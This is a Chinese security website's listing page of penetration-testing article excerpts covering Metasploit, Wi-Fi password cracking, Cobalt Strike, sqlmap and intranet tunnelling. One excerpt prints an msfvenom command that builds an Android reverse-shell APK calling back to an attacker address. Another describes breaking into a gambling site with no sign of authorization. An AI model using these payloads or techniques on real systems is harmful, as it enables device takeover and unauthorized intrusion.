首页 网络安全渗透测试

渗透测试

  • 小白黑客如何快速入门Metasploit渗透测试框架?
    Metasploit Framework(简称SMF)安全测试工具是一款开源的安全漏洞检测工具,该工具也是免费的,因此安全工作人员常用Metasploit工具来检测系统的安全性。
    2021-6-17 12:58 1510
  • 2021kali系列 -- 破解无线密码
    一、插上网卡,选择虚拟机设备,设备连接不到虚拟机,点击编辑,选择首选项二、查看是否连接到无线网卡,邮寄虚拟机的名字,选择可移动设备,无线网卡这有个对勾三、点击这里也会识别到周边的网络四、查看网卡设备1 ...
    2021-5-2 23:14 2544
  • 自动化渗透工具箱-Ary
    这里最近参与CIS大会,看到一款自动化渗透工具 Ary,特点是汇聚了各种可以调用的工具。介绍工具地址 https://github.com/TeraSecTeam/aryPOC收集 https://github.com/TeraSecTeam/poc-collectionAry是一个集各种渗透 ...
    2021-3-12 15:02 2493
  • 简单的BC站点getshell
    最近来了点任务,做BC站,以前没做过只能碰碰运气! 确定目标 主站: 简单的BC站点getshell 通过旁站: 简单的BC站点getshell 信息收集 通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。
    2021-3-11 11:14 1517
  • 全能无线渗透测试工具,一个LAZY就搞定了
    近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦。就想看看是否可以有一款功能全面的集合型工具。正所谓功夫不负有心人,还真有这么一个工 ...
    2021-1-22 12:52 1538
  • 使用sqlmap曲折渗透某服务器
    在实际渗透测试过程中,当发现目标站点存在SQL注入漏洞,一般都是交给sqlmap等工具来自动处理,证明其存在SQL注入漏洞以及获取数据库;如果当前网站使用的数据库用户为root账号,则还可以尝试获取Webshell和提权。在 ...
    2021-1-8 09:47 2311
  • 相恨见晚:玩转内网的渗透神器CobaltStrike4
    作者:ATL安全团队 来自FreeBuf一、介绍内网渗透的神器工具CobaltStrikeCobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木 ...
    2020-12-29 14:48 1658
  • 某团购CMS的SQL注入漏洞代码审计
    本次审计的CMS是基于Web应用的B/S架构的团购网站建设解决方案的建站系统,它可以让用户高效、快速、低成本的构建个性化、专业化、强大功能的团购网站,采用PHP和MYSQL数据库开发技术,版本CV1.6
    2020-11-6 09:40 1381
  • 白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下
    1.安装好 Kali Linux 的虚拟机一台 2.搭建好Sql server的靶机一个; 3.整装待发的小白一个。
    2020-10-22 14:32 1314
  • 白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描
    在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。 命令:Win+R/cmd/firewall.cpl 3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。 命令:service postgresql start
    2020-10-1 09:45 1375
  • 黑客破解wifi密码-超详细过程
    前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问…没有那个文件或目录解决办 ...
    2020-9-29 09:45 3986
  • 一次授权的渗透测试
    一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内 ...
    2020-9-7 10:06 1325
  • 分享10个渗透测试最佳工具的使用方法及下载链接
    渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安 ...
    2020-9-1 08:49 2231
  • 来路不明的安装包请勿安装
    前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulate ...
    2020-9-1 08:43 1329
  • 内网渗透:不出网渗透技巧
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场作者:诺言转载自:https://www.freebuf.com/articles/web/247287.html前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。socks隧道搭建常用工具:reGeorg,Proxifier用的比较多的一个隧道代理工具1、 ...
    2020-8-30 07:16 2365
返回顶部